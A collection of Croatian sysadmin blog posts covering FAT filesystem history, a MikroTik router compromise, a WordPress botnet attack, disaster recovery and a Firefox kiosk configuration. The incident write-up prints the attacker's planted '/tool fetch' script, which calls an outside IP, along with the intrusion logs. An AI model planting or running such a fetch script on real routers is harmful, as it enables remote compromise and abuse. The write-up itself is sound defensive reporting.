Datotečni sustav exFAT

Kategorije:

Software

Vote:

No votes yet

story_tag:

FAT

exFAT

Linux driveri

Članak o exFAT-u, novom filesystemu kojeg je izradio Microsoft, nagnao nas je da se prisjetimo povijesti Microsoftovih datotečnih sustava, od prve verzije FAT-a, kojeg smo koristili na disketama od 1977. nadalje. To je povijest koju je moja generacija iskusila od prvih (pra)početaka do danas.

Moj prvi PC, kojeg sam tada platio 4000 DEM (danas bi to bilo 2000 €), imao je Intelov 16-bitni procesor 80286 (nakon 8 bitnih to je bio velik napredak!), dva disketna pogona od 5,25 inča, te cijelih 1 MB RAM-a! Prvi tvrdi disk kupio sam nešto kasnije na Velesajmu, na sajmu informatike. Za njega sam dao 800 DEM, a imao je svega nekoliko megabajta. Za današnje standarde mnogo novca za smiješne performanse. Ali u to doba se pristojno zarađivalo, a računala su imala auru nečeg novog, tajnovitog, fantastičnog, pa nas je radoznalost tjerala da i sami iskusimo to čudo koje stvara novu budućnost.

Vratimo se FAT-u, koji se tada koristio na disketama, ali ga nismo ni bili svjesni dok je sve radilo kako treba. Svaki datotečni sustav nosi sa sobom ograničenja. Ograničene su tablice koje sadrže metapodatke, zadan je maksimalni broj datoteka, maksimalna veličina datoteke, pa onda posljedično i velična cijelog diska/particije. U igri je i veličina bloka podataka, clustera u Microsoftovoj verziji računalnih znanosti. Ako povećamo cluster, možemo raditi s većim particijama. No s druge strane rasipamo diskovni prostor ako su nam datoteke male, jer datoteka silom prilika mora zauzeti cijeli cluster.

File Alocation Table kao način organiziranja podataka na disku nastao je s prvom verzijom DOS-a.. Sa sobom je donio nekoliko svojstava, odnosno ograničenja. 8-bitni pokazivač na cluster, imena datoteka od osam znakova, točka, pa još tri znaka za ekstenziju koja označava tip datoteke. Nije se razlikovalo velika i mala slova u nazivima datoteka. FAT tablica je bila smještena na početku diskete/diska, a neželjena posljedica toga bila je da smo diskete morali bacati ako se ošteti početni sektor.

Kako je rastao kapacitet diskova, tako su izrađivane nove verzije FAT-a sposobne za adresiranje većih medija. FAT filesystem zadržao se u upotrebi do Windowsa verzije 95/98, a zatim XP donose NTFS, moćniji i pouzdaniji datotečni sustav. Od tog trenutka moglo se očekivati nestajanje FAT-a, vjerojatno nakon nekoliko godina zadržavanje podrške radi unazadne kompatibilnosti. No FAT se preselio na mobilne uređaje, digitalne fotoaparate, SD kartice, USB momoriju. Kako FAT ne poznaje vlasnika datoteka, već samo dozvole za čitanje, pisanje, brisanje, olakšano je prebacivanje datoteka s jednog uređaja na drugi. Tako FAT i dan danas podržavaju MS Windowsi, Apple, Linux, BSD Unix.

Prisjetimo se svojstava/ograničenja povijesnim redoslijedom nastanka različitih verzija FAT-a.

God	Filesystem	Najveća datoteka	Veličina diska
1977	FAT	8 MB
1980	FAT12	16/32 MB	16/32 MB
1984	FAT16	2 GB	2 GB
	VFAT	2 GB	2 GB
1996	FAT32	4 GB	8 TB
2006	exFAT	128 PB	128 PB

Prvi FAT je koristio 8 bitne pokazivače, adrese clustera, a svaka nova verzija sve veće, sa sposobnošću spremanja većih datoteka i adresiranja većih particija. FAT32 je, što se tiče fizičkih ograničenja, za današnje zahtjeve prilično zadovoljavajući, ali je Microsoft razvio još dvije "pobočne" verzije FAT-a: VFAT i exFAT.

VFAT, ili Virtualni FAT, napravljen je da prevlada ograničenje veličine imena datoteke, na taj način da zadržava stari 8.3 format, ali u tablicu dodaje novo polje s dužim imenima. Dugo ime može sadržavati do 255 znakova, uključujući znakove poput razmaka koje ranije nismo mogli koristiti, a podržava i višestruke točke u imenu. Sjećate li se vremena kad bi se datoteka koju ste nazvali MojDiplomskiRad.doc prikazivala kao MOJDIP~1.doc? To se zvalo DOS alias. Mlađi kolege i ne znaju što su propustili! :) Kad današnjim OS-ovima izdate naredbu da formatiraju datotečni sustav kao FAT32, oni će ga formatirati kao vFAT. Učinit će to i Windowsi od verzije NT nadalje, a i Linux. vFAT će biti dobar ako vam ne smeta ograničenje na veličinu datoteke od 2 GB. Ali nije sve tako sjajno. Duga imena datoteka zapunjavaju tablicu, koja ipak ima ograničenu veličinu. Root direktorij u FAT tablicama može primiti 512 datoteka ili direktorija. Ali ako koristite duga imena, taj se broj može smanjiti na samo 24. Ostale direktorije to ne pogađa, pa je trebalo paziti samo na imena u rootu.

FAT32 je nastao kao prošireni VFAT. Najveća datoteka može zauzimati 4 GB, particija 8 TB. Usput donosi još jednu korisnu stvar: oslobađa diskovni prostor tamo gdje spremamo male datoteke. Sjećate se, na FAT-u datoteka od 1 bajta zauzme cijeli cluster. Smanjivanjem clustera, što je omogućeno time što ih FAT32 može adresirati više, oslobađa se prostor na disku koji su trošile male datoteke.

exFAT opisuju kao križanac FAT32 i NTFS-a. Pogodan je tamo gdje NTFS uzima prevelik danak svojim metapodacima, dakle kod manjih diskova, ali nam s njim više ne smetaju ograničenja veličine datoteka i particija (volumena). exFAT je čest na SD karticama, standard na SDXC karticama većim od 32 GB. Usput, kao cijenu koju treba platiti, dobijamo nepotpunu kompatibilnost s FAT32.

Po svemu sudeći, exFAT bi mogao za neko dugo vrijeme biti zadnja riječ što se tiče FAT-a.

Kurioziteta radi, spomenimo da je Novell za svoj NetWare razvio Turbo FAT, znatno izmijenjenu verziju FAT-a sposobnu adresirati velike datoteke.

Microsoft nije za svoj Xbox, igračku konzolu, iskoristio postojeći FAT32, već je razvio posve nekompatibilnu verziju, FATX. Adrese clustera su 64-bitne, imena datoteka duga do 42 znaka, najveća datoteka 4 GB. Tako je, pretpostavljamo, disk Xboxa zaštićen od pristupa s drugih OS-ova.

Što se tiče Linuxa, on je najprije dobio podršku za FAT pod nazivom msdos. Tu su zadržana imena veličine 8.3 i sva ostala ograničenja FAT-a. Driver se koristio za montiranje FAT volumena, disketa i Windows particija.

Da bi se na FAT particiju mogao instalirati Linux, razvijen je umsdos. Možemo ga shvatiti kao prevoditelja koji omogućava da se Linuxov datotečni sustav sa svojom semantikom izvodi na Microsoftovom FAT-u. Ako ste na multiboot sustavu naizmjenično podizali Windowse i Linux, tada je trebalo koristiti alat koji sprečava da se izgube izmjene na datotečnom sustavu koje je napravio prethodni OS.

Treći driver, vfat (Linuxov driver piše se malim slovima) ne omogućava da se Linux instalira na originalnu FAT particiju, niti podržava semantiku ext filesystema na FAT particiji. Podržava duga imena. Danas se najčešće koristi, dolazi predinstaliran na svim distribucijama Linuxa.

Zanimljivo je da sva tri Linux drivera podržavaju FAT12, FAT16 i FAT32.

FAT je Microsoftovo vlasništvo, zaštićen patentima. Već znamo da Microsoft ne voli otvorene standarde i da nastoji zaštiti svoje vlasništvo. Komercijalne tvrtke koje žele koristiti neku verziju FAT-a plaćaju Microsoftu premiju. No kako naplatiti korištenje FAT drivera brojnim Linux distribucijama koje nisu komercijalne? To je tema za sebe, nećemo se time ovdje baviti. Spomenimo samo da je Microsoft tužio tvrtku TomTom, čiji proizvod radi na Linuxu, radi korištenja VFAT-a. Postigli su dogovor, pa je parnica obustavljena. TomTom se izvukao tako što je dao Microsoftu prava na pet svojih patenata!

U narednom članku pozabavit ćemo se tehničkim detaljima da bi objasnili kako FAT koristi metapodatke za adresiranje datoteka.

uto, 2018-07-31 21:24 - Aco Dmitrović

Kategorije:

https://www.securityweek.com/remotely-exploitable-vulnerability-discovered-mikrotiks-routeros

Vote:

No votes yet

story_tag:

FAT

filesystem

datotečni sustav

uto, 2018-08-07 11:16 - Damir Mrkonjić

Sigurnost CARNet Abuse služba mi rijetko piše, pa me prije neki dan iznenadila njihova poruka... A pisali su mi da je zaprimljena prijava pokušaja neovlaštenog pristupa sa jedne moje IP adrese. Iznenađenje je bilo još veće kad sam shvatio da se ta IP adresa odnosi na jedan Mikrotik router. Iza tog routera nalazi se oprema za video nadzor instituta u vlasništvu tvrtke koja je za to angažirana.

The following table of IP addresses, dates and times should help you
correlate the origin of the abusive activity. The time stamps are
approximate from our logs. The actual timing of the events depend on
the signature matched. It is very likely to have occurred both before,
during and following the times listed.

Approximate Time Range (UTC), IP Address, Reason
2018-07-30 13:32:00 ~ 2018-07-30 14:32:00 (UTC), 161.53.36.xxx,
Account Takeover Attempts

It is most likely the attack traffic is directed at one of the following
endpoints:

account.sonyentertainmentnetwork.com
auth.api.sonyentertainmentnetwork.com

These endpoints on our network are resolved by Geo DNS, so the IP
addresses they resolve to will depend on the originating IP address.

The destination port will be TCP 443.

Prvo sam pomislio da problem stvara neki od uređaja spojenih na taj router, a onda sam pogledao stanje na samom routeru. I u logu našao ovo:

jul/28 01:18:41 system,error,critical login failure for user admin from 95.154.216.151 via winbox
jul/28 01:18:42 system,info,account user admin logged in from 95.154.216.151 via winbox
jul/28 01:18:42 system,info socks config changed by admin
jul/28 01:18:43 system,info new script added by admin
jul/28 01:18:43 system,info new script scheduled by admin
jul/28 01:18:43 system,info new script added by admin

Dakle, sve je jasno - neprijatelj je pristupio routeru, preko winbox-a, postavio i pokrenuo neku skriptu.... Bio je već kraj radnog vremena, pa sam rješavanje problema ostavio za sutradan. Ujutro me dočekalo još nešto - hrpa spama na poslužitelju. Uvidom u log ustanovio sam da spam dolazi sa routera.

Pretraživanjem preko Googlea naišao sam na dosta informacija, ukratko problem je prisutan od veljače 2018. Mikrotik je problem popravio izdavanjem nove verzije operacijskog sustava.

Na mreži imam još jedan takav uređaj i na njemu nije bilo problema. Osim što na oba uređaja nisam godinu dana nadograđivao operacijski sustav i firmware. To je standardni problem - sve radi i zaboravi se na to da ponekad treba provjeriti ima li što novoga....

Trebalo je riješiti problem, da se Abuse služba ne ljuti...

Kao što vidimo, provala je izvršena preko winbox protokola. Kako sam ja ove routere konfigurirao dijelom preko web sučelja, a dijelom preko ssh protokola i naredbene linije onda mi je prvo pitanje bilo 'a što je sad ovo?'. Da, Winbox je mali program koji omogućava konfiguriranje routera. Kako to ne koristim odmah sam ga isključio.

Sljedeće je bilo nadogradnja operacijskog sustava i firmwarea. To se jednostavno napravi preko web sučelja - izbornik System/Packages, pa Check for updates (nadogradnja operacijskog sustava); izbornik System/Routerboard pa Upgrade (nadogradnja Firmwarea). Naravno, iza svake od ovih operacija slijedi ponovno pokretanje uređaja.

Time su spriječene nove provale u sustav, ali nije riješen problem jer je i dalje ostala skripta koju je neprijatelj ostavio. Ali i to je bilo lako naći preko web sučelja - izbornik System/Scripts. I našao sam ovo:

/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

Nisam se uopće trudio proučiti što ovo radi, neko sam odmah obrisao i nadao se da je sve u redu....

Ali nije to bilo dovoljno, na grafovima mrežnog prometa (koje ovakvi routeri imaju) vidio sam da se povremeno još ima nekog prometa koji nije očekivan. Najlakše za vidjeti što se dešava je kroz izbornik IP/Firewall, pa odabrati Connections. Tu se vidi trenutni promet, pa sam primjetio da se povremeno javlja dosta zahtjeva na port 53. Skenirao sam taj uređaj sa nmap-om i utvrdio da je port 53 (DNS) otvoren (na drugom istom uređaju nije). Čak je i odgovarao na DNS upite. Očito je da je i to nešto što je neprijatelj ostavio...

Trebalo je zabraniti pristup portu 53. Ovakve stvari je lakše podesiti preko naredbene linije, pa sam se spojio na uređaj i izvršio sljedeće:

/ip firewall filter

add action=drop chain=input connection-state=new dst-port=53 in-interface=ether1 protocol=udp

add action=drop chain=input connection-state=new dst-port=53 in-interface=ether1 protocol=tcp

Pa i nmap sad kaže ovako:

53/tcp filtered domain

I s ovim je problem riješen, bar za sada tako izgleda. Nema više sumnjivog prometa, u logu nema nikakvih zapisa o prijavama sa nepoznatih adresa, nema ni spama na serveru...

Poučak na kraju - ne treba zaboravljati na ovakve uređaje koji dobro rade, treba i njih nadograđivati, povremeno se spojiti na njih i pogledati logove.

Vijesti:

Sigurnost

Kategorije:

Mrežna sigurnost

Vote:

No votes yet

story_tag:

informacijska sigurnost

Svaki će sistemac prije ili kasnije doživjeti da mu provale na neki od njegovih servera. Većina nerado govori o tome, kao da je to sramota. Počiste sve u tišini i šutke idu dalje. Ali nema tu nikakve sramote. Nema tog umreženog računala na koje se ne može provaliti, pitanje je samo da li su napadači spremni uložiti potrebno vrijeme i resurse. Osim ciljanih napada na vrijedne mete, događaju se automatizirani napadi koji naprosto tuku redom po nekom rasponu IP adresa. Ako nemate vrijedne informacije, napadači će već naći način da iskoriste vaša računala za svoje ciljeve.

Autora ovih redaka možete dodati na listu sistemaca kojima su u prvim danima karijere provalili na server. U to doba je Red Hat dolazio s nekoliko "defaultnih" korisničkih računa koji nisu imali passworde! Jedan od njih je bio Gonzo! Bio je to valjda nečiji uvrnuti smisao za humor. Kad bi napadač našao lokalni exploit, ulogirao bi se telnetom kao Gonzo, pokrenuo exploit i dobio veće ovlasti! Jednostavno, zar ne? Bila su to druga vremena, početkom devedesetih, sve je bilo u duhu dijeljenja, uzajamnog pomaganja. Kad bih svratio u CARNet pitali bi me da li sam digao anonimni FTP servis! Da ljudi mogu dijeliti datoteke. Odgovarao sam da na serveru nemam dovoljno diskovnog prostora, što je bilo istina. Danas bih, u duhu sadašnjice, odgovorio drugačije: Ne želim da mi server zatrpaju pornografijom. Onda sam jednog jutra našao mail od roota, u kojem mi neki scriptie kid s visoka priopćava da on sad posjeduje moj server. Kako znam da se radi o klincu? Profesionalac se ne bi razmetao, trudio bi se da što duže ostane neotkriven. To me natjeralo da se više posvetim informacijskoj sigurnosti. Svakog sam jjutra provjeravao logove, instalirao nove pakete i zakrpe, pratio obavijesti o ranjiovstima. Poslije svake instalacije/upgradea brisao sam Gonza i veselo društvo, dok se oni gore nisu opametili i maknuli ih iz distribucija. U to doba nije bilo paketa za SSH servis, pa sam skidao izvorni kod, kompilirao ga i ručno instalirao kako bi uvijek imao zadnju verziju. Jedva sam čekao da maknem telnet, tada standardni protokol za udaljeni rad, da username i password više ne putuju mrežom kao plaintext, bez enkripcije. Gonzo s povećanim privilegijama mogao je snifati sav mrežni promet. Dugo sam morao čekati na to, jer moji korisnici nisu imali SSH klijente, dok je telnet bio standardan dio svih verzija Windowsa. Bila su to pionirska vremena!

Tada, početkom devedestih, nisam se imao kome obratiti za pomoć,osim kolegama na Srcu, ali sam rado pomagao drugima, koliko je bilo u mojoj moći. Dijeljenje iskustava odličan je način učenja i prenošenja znanja. Nešto naučiš kolegu, nešto naučiš od njega. Zašto bi se svatko od nas sam nosio s problemima i otkrivao toplu vodu?

Otkad sam kao zaposlenik Srca davnih dana pokrenuo CARNetov portal za sistemce, nastojao sam nagovoriti kolege kojima sam (u svojstvu voditelja sigurnosti) pomagao pri rješavanju incidenata da napišu članak o tome. S minimalnim, bolje rečeno nikakvim uspjehom. Nedavno se kolega Mrki ohrabrio i prenio nam kako su mu provalili na router. Bravo Mrki! Dragocjeno iskustvo, mnogi će sada brzo zaštiti svoje Mikrotike.

Na Internetu sam pronašao članak u kojem iskusan i ugledan informatičar opisuje kako se pet dana nosio s automatiziranim napadima na svoja dva bloga. Iskreno je pobrojao svoje greške, ispričao kako se na kraju uspio othrvati napadačima.

Michael Fauscette je voditelj istraživačkog odjela tvrtke G2 Crowd, čiji je proizvod platforma na kojoj zajednica raspravlja o poslovnom softveru. Sami korisnici ocjenjuju softver koji su kupili i koji svakodnevno koriste, nema opasnosti od prikrivenog reklamiranja! Dragocjeno, zar ne? Prije tog posla Fauscette je radio preko 10 godina kao analitičar i istraživač tržišta u izdvačkoj kući IDC. Dakle, radi se o čovjeku kojem IT i informacijska sigurnost nisu strane. Ali ipak moramo reći da nije "čistokrvni" sistemac, vjerojatno je samo priučen.

Fauscette upravlja kao admin s dva bloga koja rade na WordPressu. Radi se virtualnim serverima iznajmljenim u oblaku. U paketu je dobio srednju razinu sigurnosti, osnovni firewall i besplatni antivirus. Podesio je sustav tako da mu se pošalje mail svaki put kad se netko pokuša ulogirati kao admin.

Evo ukratko kronike napada izvedenog uz pomoć botneta. Jedne je večeri, nakon što je već legao, dobio obavijest da se netko ulogirao u njegov admin račun. Sjeo je za notebook, pokušao se ulogirati da vidi o čemu se radi, ali nije uspio jer mu je zaporka već bila promijenjena. Nazvao je hosting kompaniju, koja mu je omogućila pristup. Počistio je sustav (instalirali su plugin koji rudari Bitcoine), promijenio password. U međuvremenu je dobio istu obavijest s drugog servera i odradio sve kao na prvom.

Pred jutro iste noći sve se ponovilo. Opet se nije mogao ulogirati bez pomoći hosting tvrke, opet je morao brisati kukavičja jaja. Shvatio je da se mora pobrinuti za bolju zaštitu, ali dok je proučavao sustav ponovo su provalili. Valjda su bili ljuti na njega, ovog su puta pobrisali sadržaj oba bloga, pa je sve morao vraćati iz backupa koji mu je osigurala hosting tvrtka.

Uključio je TFA, dvostruku autentikaciju i digao razinu antivirusne zaštite, ali ni to nije zaustavilo napadače u novom naletu. Hosting tvrtka je sa svoje strane povećala sigurnost servera, ali su napadači već ostavili višestruke backdore koji su im omogućili povratak. Ovog su puta onemogućili dvostruku autentikaciju, pa Fauscette nakon unosa zaporke više nije dobijao PIN za potvrdu identiteta.

Nakon pet dana i pet uspješnih napada oba bloga su u potpunosti prešla na HTTPS protokol, dakle morao je kupiti certifikate, ali i doplatiti za bolji vatrozid. Na kraju ove priče nude nam tri zaključka:

Sve što je spojeno na Internet je ranjivo

Ne nadajte se da ćete otkriti tko vas je napao (tragovi su vodili do Indonezije, Koreje, Azije, nekoliko istočnoeuropskih zemalja...)

Zaštite svoj site (nabavite IDS ili vatrozid nove generacije, koristite password manager koji generira složene zaporke i čuva ih kriptirane u bazi kojoj samo vi imate pristup, neprestano istražujte i učite, a za WordPress ili neku drugu platformu koju koristite nabavite, proučite i primijenite najbolje prakse).

Mnogo posla ako želite izbjeći provalu! Kao i uvijek, prevencija je bolja od kurative. Ipak sistemac ne može biti netko tko to radi usput, uz ostale poslove. A informacijska sigurnost je neizbježna sastavnica našeg posla, još jedan dodatak na sve veću listu zaduženja.

Čitajući o Fauscettovom iskustvu, nameće se zaključak da je rješenje u novcu. Kao da je Fauscette štedio, uzeo minimalan paket usluga, blog bez HTTPS protokola i kupljenih certifikata, s elementarnim vatrozidom. Izvukao se doplatom za bolju uslugu. No iz naše perspektive, mnogo se toga može uraditi bez novca, ako se ulaži malo znanja i truda. Kad se iskoriste sve mogućnosti koje nam nudi slobodni softver, može se posegnuti za novčanikom i uložiti nešto u skupa poboljšanja. No ja govorim o serveru kojeg sistemac ima na ustanovi, s Linuxom, za kojeg ima mnogo dobrih zaštitnih alata, dok je Fauscette u drugačijem okruženju: on naprosto koristi uslugu iz oblaka. Njegovo se administriranje svodi na klikanje (ispričavam se ako sam ciničan). Možda sam zastario, ali na Linux serveru je moja generacija koristila brojne mogućnosti zaštite koje ne koštaju ništa. Na primjer dinamičku listu pristupa: kad s iste adrese stiže više od N zahtjeva za otvaranjem konekcije, ta se IP adresa blokira narednih pola sata. Itd, its... Ali više o tome nekom drugom prilikom.

pon, 2018-08-13 21:28 - Aco Dmitrović

Kategorije:

Vote:

No votes yet

story_tag:

sigurnost

botnet

provala

Disaster recovery, oporavak od nesreće, u opisu je posla sistem inženjera. Osim što svakodnevno "podmazujemo" naša računala i mrežu, trebali bismo se unaprijed pripremiti za neku moguću katastrofu, kako bi ublažili posljedice i što prije vratili sustave u produkciju.

Kako bi to trebalo izgledati? Prvi korak je inventura svega, hardvera, fizičke mreže, softvera, podataka. Zatim bi trebalo klasificirati podatke, odlučiti što treba čuvati i koliko dugo. Nešto od toga je već riješila država regulativom, na primjer knjigovodstveni podaci moraju se čuvati 10 godina. Pogledajte Zakon o arhivskoj građi. Osobni podaci također imaju svoju zakonsku zaštitu. Nešto će ovisiti o vrijednosti podataka za poslovanje organizacije, rezultati istraživanja, patenti, upute za proizvodnju i slično vrijedni su čuvanja. Ali ponešto od toga imalo bi smisla sačuvati i radi širih interesa, jer je zanimljivo za cijelu ljudsku civilizaciju. Uvijek sa zanimanjem pogledam strane dokumentarne serije koje nam žele približiti neko razdoblje prošlosti. Najzanimljiviji dio je kad se zapute u arhive i tamo pronađu dokumente koji nam pružaju životne podatke o konkretnim ljudima i zbivanjima. Žureći svakog dana da odradimo posao i ne razmišljamo o tome što bi trebalo sačuvati "za vijeke vijekova". Tek će netko u dalekoj budućnosti, ako uspijemo ponešto sačuvati, znati cijeniti vrijednost naših podataka.

Kakve to katastrofe možemo očekivati? Požar, poplave i potres nam odmah padaju na pamet. Nisu svakodnevna pojava u našoj blizini, ali su česti u vijestima iz sviejta. Zagreb je bio poplavljen 1964-te, Sava se najprije prelila sve do glavnog kolodvora, pa i dalje, sjećam se vode u Draškovićevoj ulici, s druge strane pruge. Nakon toga sagrađeni su nasipi, ali nije nezamislivo da nasip popusti, pa bi se poplava mogla ponoviti. U kritičnoj zoni su Srce, mnogi fakulteti, zgrada televizije, NSK...

Ni potresi za nas "purgere" nisu novost, ljuljali smo se kad su bili veliki potresi u susjednoj Italiji. Iz povijesti znamo da je 1590. potres srušio Medvedgrad, a katedrala je izgrađena na mjestu stare, srušene u potresu 1880.

Nevolja koja nas uvijek može zadesiti na ovom geopolitički "trusnom" području je rat. Naši roditelji su preživjeli Drugi svjetski rat, a mi ovaj nedavni, Domovinski. Srećom je to bio ograničen sukob, pa informatička infrastruktura nije stradala izvan ratnih zona.

Eksplozija atomske bombe vjerojatno bi uništila većinu hardvera u nekom radijusu oko epicentra. Ali nećemo o tome, jer nakon Hiroshime atomsko oružje, srećom, služi kao sredstvo odvraćanja.

Sve se nabrojane katastrofe ipak mogu preživjeti. Ljudi će raskrčiti krš, popraviti električnu, vodovodnu i plinsku mrežu, omogućiti povratak normalnog, civiliziranog života. Tehnologija oporavka IT strukture je poznata: sekundarni data centri razasuti po različitim tektonskim zonama, daleko od rijeka i klizišta, kopije servera, storagea, softvera, podataka na više lokacija. Računa se da će nešto od svega toga ostati sačuvano.

Zar ne biste, ako nas takva nesreća zadesi, željeli imati kopije podataka negdje daleko, pohranjene na sigurnom? Ako su tamo i rezervni serveri, naši (preživjeli) korisnici mogli bi do svojih mailova i dokumenata.

U Akademiji nemamo novca za ambiciozne projekte, zato sam u svoje vrijeme pokušao zainteresirati Carnet i Srce da ponude ustanovama članicama backup podataka u oblaku. Nije bilo odaziva. Mnogo posla, malo novca, sasvim dovoljno razloga da se lako odustane. Osim toga, pitali su se koliko bi ustanova uopće koristilo online backup? Uputili su me na komercijalne tvrtke. Ako ustanova za koju radim ima vrijedne podatke, neka se sama brine za njih. Moja teza da će to biti skuplje ako svaka ustanova sklapa ugovor za sebe, umjesto da se nastupi zajednički, nije naišla na odaziv. Na Srcu su mi rekli da će ponuditi diskovni prostor samo ako su podaci koji se čuvaju javni i dostupni svima. Ima logike u tome, ali i podaci koji nisu javni, iz različitih više ili manje opravdanih razloga, mogu biti izuzetno vrijedni, ne samo za ustanovu, nego za širu zajednicu, pa i čovječanstvo. Na kraju odzvanja pitanje bez odgovora: Tko će to platiti?

Možemo li, kao intelektualnu vježbu, zamisliti neku katastrofu koja bi zahvatila cijelu planetu, izazvala masovno izumiranje, zamračila nebo i uzrokovala ledeno doba? Nešto poput pada asteroida prije 65 miliona godina. Udaru stijene promjera petnaestak kilometara pripisuje se izumiranje dinosaura. Preživjeli su mali sisavci i započeli novi ciklus obnove života. Takvih je masovnih izumiranja, kažu geolozi i biolozi, u prošlosti Zemlje bilo pet, a veliki asteroidi pogađaju našu planetu svakih 100 miliona godina. To je statistički prosjek, nemojte se prerano obradovati računajući da imamo na raspolagnju još 35 miliona godina do sljedećeg izumiranja. Asteroid nas može pronaći već sutra. Na rubu solarnog sustava mnoštvo je kometa i asteroida, mnoštvo ih je i u orbiti između Marsa i Jupitera. Nekad su nas učili u školi da je vjerojatno u tom prostoru bio planet koji se raspao, pa je nastao asteriodni pojas. Danas se pretpostavlja da se na tom mjestu nije ni formirao planet, a krivac je Jupiter sa svojom snažnom gravitacijom. Asteroidi iz tog pojasa bivaju povučeni prema Jupiteru, ako ne padnu na njega mijenja im se putanja i mogu nam se naći na putu. Dakle takva planetarna katastrofa je moguća, iako je mala vjerojatnost da će se to dogoditi za našeg života. Pa zašto bi onda brinuli?

Neki već brinu i pripremaju se na najgore. Na više mjesta, od kojih je najpoznatiji norveški otok Svalbard, čuva se sjeme korisnih biljaka. Čuva se gentetska informacija, genetska raznolikost.

Ako se dogodi katastrofa tolikih razmjera, čemu uopće razmišljati o temi kao što je disaster recovery. Bez struje, telekomunikacija, bez industrije, civilizacije, vrlo brzo će se izgubiti znanja o tome kako se proizvode računala, izgubit ćemo i sve informacije spremljene na njima. Hoće li se čovječanstvo, ako dio preživi, vratiti u pećine, pretvoriti u lovce skupljače, ispočetka otkrivati prirodne zakone, izmišljati nove religije i usavršavati tehnologije, graditi civilizacije? Može li se taj proces ubrzati? Zapravo se pitamo možemo li sačuvati znanje koje smo mukotrpno sticali kroz milenije?

Denis Diderot je krenuo u projekt Enciklopedije sa željom da se na jednom mjestu skupi svo znanje čovječanstva. Danas to znanje više ne bi stalo u nekoliko knjiga. Google books je zametak projekta stvaranja globalne biblioteke, ali zapravo je i cijeli Internet postao jedna velika riznica znanja. Čini se da bi gubitak Interneta bio najgori i najveći gubitak pri uništenju civilizacije. Jer podaci se danas uglavnom čuvaju u digitalnom obliku. Iako u ovoj rubrici uglavnom govorimo o tamnoj strani Interneta, itekako smo svjesni njegove vrijednosti.

Sistemac ne može sam, bez podrške uprave, ništa napraviti. Ne može ni obnoviti Internet, ako se dogodi globalni raspad. Ali možda može sačuvati ponešto znanja koje bi koristilo za obnovu?

Lewis Dartnell napisao je Priručnik za preživjele, preveden i kod nas (EPH Media, ISBN 978-953-338-166-4). U originalu naslov je The Knowledge How to Rebuild Our World from Scratch. Knjiga sadrži praktične upute kako poslije apokalipse možemo sami proizvoditi hranu, liječiti ljude, lijevati željezo.. Knjiga je odlično štivo, ne samo za razbiibrigu, već i praktičan priručnik za preživljavanje. Odmah me zagolicala radoznalost., počeo sam razmišljati o tome što staviti u ruksak koji ću ponijeti kad izjurim iz kuće. Šator, vreća za spavanje, lijekovi, lovački nož, kresivo za paljenje vatre, sklopiva čaša, kemikalije za dezinficiranje vode, sjemenke za hranu i sadnju... itd. its. Lista je dugačka, stalno raste, čini se da jedan ruksak nije dovoljan. A onda sam pomislio da bi trebalo ponijeti notebook i vanske diskove s knjigama koje bi mogle biti korisne, glazbom koju volim slušati... Nije sve u golom preživljavanju. Trebalo bi riješiti problem proizvodnje električne energije iz sunca, vjetra, tekuće vode, kako bi mogao koristiti račučnalo. Sve se to može napraviti. Alternator i akumulator iz automobila, uz vjetrenjaču koju možemo sami napraviti, dat će nam struju. Darnell u knjizi navodi mnoge reference na korisna izvore znanja. Trebat će to prikupiti.

Čini se da sam našao zanimaciju koja će me zaokupljati duže vrijeme. Ako naši poslodavci ne razmišljaju duže od svog mandata, zašto bi to ograničavalo poduzetnog i radoznalog sistemca?

Ako se zapitamo tko će platiti trud za očuvanje znanja, eto odgovora: platit će preživjeli, koji će morati sve nanovo otkrivati. Ali to nije naša briga, zar ne? Nismo za to plaćeni. :(

čet, 2018-09-13 23:22 - Aco Dmitrović

Kategorije:

Vote:

No votes yet

story_tag:

disaster recovery

oporavak

PGina je sjajan komad softvera, ali ukoliko koristimo ovaj način autentikacije korisnika, možda naiđdemo na situaciju kada terbamo dodatna podešavanja na sustavu. U našem slučaju trebali smo novim studentima olakšati pronalaženje bibliografske baze podataka Fakulteta.

Potrebno je napraviti da se prilikom startanja Chromea ili Firefoxa odmah prikaže željena stranica. Naime, prilikom odjave s računala pGina briše sve promjene unutar profila, pa je tako nemoguće postaviti Start Up stranicu, a da on preživi odjavu korisnika. Odjavom s računala cijeli profil se briše, kao i eventualni podaci koje je student pohranio na tom računalu (iako postoji upzorenje o tome).

Na svim računalima instalirani su uobičajeni web preglednici (plus ugrađeni Microsoftov internet preglednik), Mozilla Firefox i Google Chrome.

Postupak podešavanja i postavljanja početne web stranice objasnit ćemo za preglednike Firefox i Google Chrome, jer ugrađeni internet preglednik zahtjeva Active Directory.

Kako je gore napomenuto, studenti se prijavljuju s AAI@Edu.hr korisničkim identitetom, a na svim računalima instalirana je pGina.

PGina je podešena na način da se nakon odjave briše korisnički profil, što ima posljedicu da se preglednik uvijek pokreće s osnovnim postavkama (Welcome Screen).

Upute za Firefox:

Procedura za Firefox sastoji se od kreiranje sljedećih datoteka:
    - override.ini
    - local-settings.js
    - mozilla.cfg (popis opcija za konfiguraciju možete dobiti upisom "about:config")

U datoteku "override.ini" treba upisati:

[XRE]
//ne prikazuje se "Import Wizard"EnableProfileMigrator=0

U datoteka "local-settings.js" (prva linija mora započeti s komentarom, odnosno znakovima //):

//
    //omogućavamo korisniku da radi izmjene u Firefoxu za vrijeme     //trajanje njegovog profila, nakon odjave sve se poništava
        pref("general.config.obscure_value", 0);
pref("general.config.filename", "mozilla.cfg");

U datoteku "mozilla.cfg" upisujemo (ne zaboravimo, prvi redak mora započeti s //)

//ne prikazuj "WhatsNew" prilikom prvog pokretanja
pref("browser.rights.3.shown", true);
// ne prikazuj "know your rights'
pref("browser.rights.3.shown", true);
//ne pitaj za default browser
pref("browser.shell.ceckDefaultBrowser", false);
pref("browser.startup.homepage_override.mstone","ignore");
//postavi osnovnu stranicu (primjerice: webserver.domena.hr)
pref("browser.startup.homepage", "http://161.53.XXX.YYY");

Nakon kreiranja ovih datoteka, moramo ih iskopirati na točno određena mjesta unutar Windows datotečnog sustava.

Datoteku local-settings.js kopiramo u:

c:\Program files\Mozilla Firefox\defaults\pref

a datoteku "override.ini" i "mozilla.cfg" u:

c:\Program files\Mozilla Firefox

Pokrenimo Firefox, ako je sve u redu, treba se učitati stranica postavljenja u konfiguracijskoj datoteci "mozilla.cfg" (na primjer, svima poznata web stranica https://sysportal.carnet.hr):

Upute za Google Chrome

Slično kao i kod Mozille, Chrome kod prvog pokretanja prikazuje "Welcome to Chrome" stranicu:

